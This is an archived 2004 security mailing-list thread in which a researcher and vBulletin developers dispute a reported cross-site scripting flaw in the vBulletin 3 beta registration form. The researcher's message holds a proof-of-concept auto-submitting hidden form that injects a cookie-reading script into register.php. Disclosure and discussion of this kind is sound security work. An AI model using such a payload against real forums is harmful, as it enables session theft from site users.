-----Original Message-----
From: Scott MacVicar [mailto:scott (at) vbulletin (dot) com [email concealed]]
Sent: Friday, January 23, 2004 8:10 PM
To: ferruh (at) mavituna (dot) com [email concealed]
Cc: kier (at) vbulletin (dot) com [email concealed]; vuln-dev (at) securityfocus (dot) com [email concealed]
Subject: RE: vBulletin Security Vulnerability
Hello,
The issue you are now reporting is for a completely different version. And
its not even the same problem. vBulletin 3 and vBulletin 2 are different
code bases and again the issue that you are trying to identify is not
present.
As you can see above the only time the variable regtype is reference is
within the register.php code and it's a comparison and not directly
outputted. The regtype was removed after Beta 7 for a new registration
method.
----------------------
Scott MacVicar
Developer, vBulletin
> -----Original Message-----
> From: Ferruh Mavituna [mailto:ferruh (at) mavituna (dot) com [email concealed]]
> Sent: 23 January 2004 05:07
> To: 'Kier Darby'; vuln-dev (at) securityfocus (dot) com [email concealed]
> Subject: RE: vBulletin Security Vulnerability
>
> Hello;
>
> This must be an option or something like that in new vBulletin, After
> a small search on Google you can find all "vBulletin v3.0.0 Beta 7"
> forums.
>
> --------------------------------------------------------------
> -------------
> "We can only assume that this vulnerability was found in a site
> running code modified from that supplied by Jelsoft."
> --------------------------------------------------------------
> -------------
>
> Not "a site", most of them vulnerable. If you provide this
> customization yes vBulletin is not vulnerable but "Jelsoft
> customizations" are vulnerable.
>
> And most of these forums have register.php "Standard / Quick"
> selection and
> "regtype" hidden field.
>
> Almost %80 of your customers are vulnerable.
>
>
> Ferruh.Mavituna
> http://feruh.mavituna.com
> PGPKey : http://ferruh.mavituna.com/PGPKey.asc
>
> -----Original Message-----
> From: Kier Darby [mailto:kier (at) vbulletin (dot) com [email concealed]]
> Sent: Wednesday, January 21, 2004 10:36 PM
> To: vuln-dev (at) securityfocus (dot) com [email concealed]
> Subject: Re: vBulletin Security Vulnerability
>
> In-Reply-To: <20040120190824.GA4674 (at) natalya.rebby (dot) com [email concealed]>
>
> No patch has been issued for this 'vulnerability' because no
> vulnerability exists.
>
>
>
> There is no hidden field called "reg_site", nor any $reg_site variable
> anywhere in the vBulletin 2 or vBulletin 3 source code or templates,
> nor has it ever existed.
>
>
>
> We can only assume that this vulnerability was found in a site running
> code modified from that supplied by Jelsoft.
>
Previous exploit affects vB3 beta 2 through Beta 7.
To patch this exploit, please update to vB3 Gamma or later.
Ferruh.Mavituna
http://feruh.mavituna.com
PGPKey : http://ferruh.mavituna.com/PGPKey.asc
-----Original Message-----
From: Ferruh Mavituna [mailto:ferruh (at) mavituna (dot) com [email concealed]]
Sent: Friday, January 23, 2004 11:35 PM
To: 'vuln-dev (at) securityfocus (dot) com [email concealed]'; 'Kier Darby'
Subject: RE: vBulletin Security Vulnerability - POC
I'm sending proof of concept again [ http://ferruh.mavituna.com/article/?256
- 06.08.2003 ];
Test this code in forums which are use "vBulletin v3.0.0 Beta 7". Most of
them are vulnerable. I discovered this in "Beta 2" about 3 months ago.
---------------------------------------------------------------
PROOF OF CONCEPT;
---------------------------------------------------------------
<form action="http://[VICTIM - FORUM PATH]/register.php?do=register"
method="post" style="display:none">
<input type="hidden" name="s" value="" />
<input type="hidden" name="regtype" value="1" />
<input type="text" class="bginput" name="field1" value="" size="25"
maxlength="250" />
<input type="hidden" name="url" value="index.php" />
<input type="hidden" name="do" value="addmember" /> </form> <script>
//Code that will be executed
var xss = "\"><script>alert(document"+".cookie)<\/script>";
document.forms(0).field1.value=xss;
document.forms(0).submit();
</script>
---------------------------------------------------------------
---------------------------------------------------------------
Current vulnerable versions;
---------------------------------------------------------------
vBulletin 3.0 Beta 2 <-> Beta 7
(If have standard / quick registration option)
Ferruh.Mavituna
http://feruh.mavituna.com
PGPKey : http://ferruh.mavituna.com/PGPKey.asc
Ferruh.Mavituna
http://feruh.mavituna.com
PGPKey : http://ferruh.mavituna.com/PGPKey.asc
-----Original Message-----
From: Scott MacVicar [mailto:scott (at) vbulletin (dot) com [email concealed]]
Sent: Friday, January 23, 2004 8:10 PM
To: ferruh (at) mavituna (dot) com [email concealed]
Cc: kier (at) vbulletin (dot) com [email concealed]; vuln-dev (at) securityfocus (dot) com [email concealed]
Subject: RE: vBulletin Security Vulnerability
Hello,
The issue you are now reporting is for a completely different version. And
its not even the same problem. vBulletin 3 and vBulletin 2 are different
code bases and again the issue that you are trying to identify is not
present.
----------------------------
[root@devbox vb3b7]# grep -rna "regtype" *
install/vbulletin-style.xml:6866:<input type="hidden" name="regtype"
value="1" />
install/vbulletin-style.xml:7728: <input type="hidden" name="regtype"
value="2" />
install/vbulletin-style.xml:12018: <label for="rb_regtype_1"><input
type="radio" name="regtype" value="1" id="rb_regtype_1" checked="checked"
/><b>Standard</b> - Normal, full length registration form.</label><br />
install/vbulletin-style.xml:12019: <label for="rb_regtype_2"><input
type="radio" name="regtype" value="2" id="rb_regtype_2" /><b>Quick</b> -
Shorter, but less option-filled registration form.</label><br />
install/vbulletin-style.xml:12094: <label for="rb_regtype_1"><input
type="radio" name="regtype" value="1" id="rb_regtype_1" checked="checked"
/><b>Standard</b> - Normal, full length registration form.</label><br />
install/vbulletin-style.xml:12095: <label for="rb_regtype_2"><input
type="radio" name="regtype" value="2" id="rb_regtype_2" /><b>Quick</b> -
Shorter, but less option-filled registration form.</label>
register.php:1302: if ($_REQUEST['regtype'] == 2)
----------------------------
As you can see above the only time the variable regtype is reference is
within the register.php code and it's a comparison and not directly
outputted. The regtype was removed after Beta 7 for a new registration
method.
----------------------
Scott MacVicar
Developer, vBulletin
> -----Original Message-----
> From: Ferruh Mavituna [mailto:ferruh (at) mavituna (dot) com [email concealed]]
> Sent: 23 January 2004 05:07
> To: 'Kier Darby'; vuln-dev (at) securityfocus (dot) com [email concealed]
> Subject: RE: vBulletin Security Vulnerability
>
> Hello;
>
> This must be an option or something like that in new vBulletin, After
> a small search on Google you can find all "vBulletin v3.0.0 Beta 7"
> forums.
>
> --------------------------------------------------------------
> -------------
> "We can only assume that this vulnerability was found in a site
> running code modified from that supplied by Jelsoft."
> --------------------------------------------------------------
> -------------
>
> Not "a site", most of them vulnerable. If you provide this
> customization yes vBulletin is not vulnerable but "Jelsoft
> customizations" are vulnerable.
>
> And most of these forums have register.php "Standard / Quick"
> selection and
> "regtype" hidden field.
>
> Almost %80 of your customers are vulnerable.
>
>
> Ferruh.Mavituna
> http://feruh.mavituna.com
> PGPKey : http://ferruh.mavituna.com/PGPKey.asc
>
> -----Original Message-----
> From: Kier Darby [mailto:kier (at) vbulletin (dot) com [email concealed]]
> Sent: Wednesday, January 21, 2004 10:36 PM
> To: vuln-dev (at) securityfocus (dot) com [email concealed]
> Subject: Re: vBulletin Security Vulnerability
>
> In-Reply-To: <20040120190824.GA4674 (at) natalya.rebby (dot) com [email concealed]>
>
> No patch has been issued for this 'vulnerability' because no
> vulnerability exists.
>
>
>
> There is no hidden field called "reg_site", nor any $reg_site variable
> anywhere in the vBulletin 2 or vBulletin 3 source code or templates,
> nor has it ever existed.
>
>
>
> We can only assume that this vulnerability was found in a site running
> code modified from that supplied by Jelsoft.
>
[ reply ]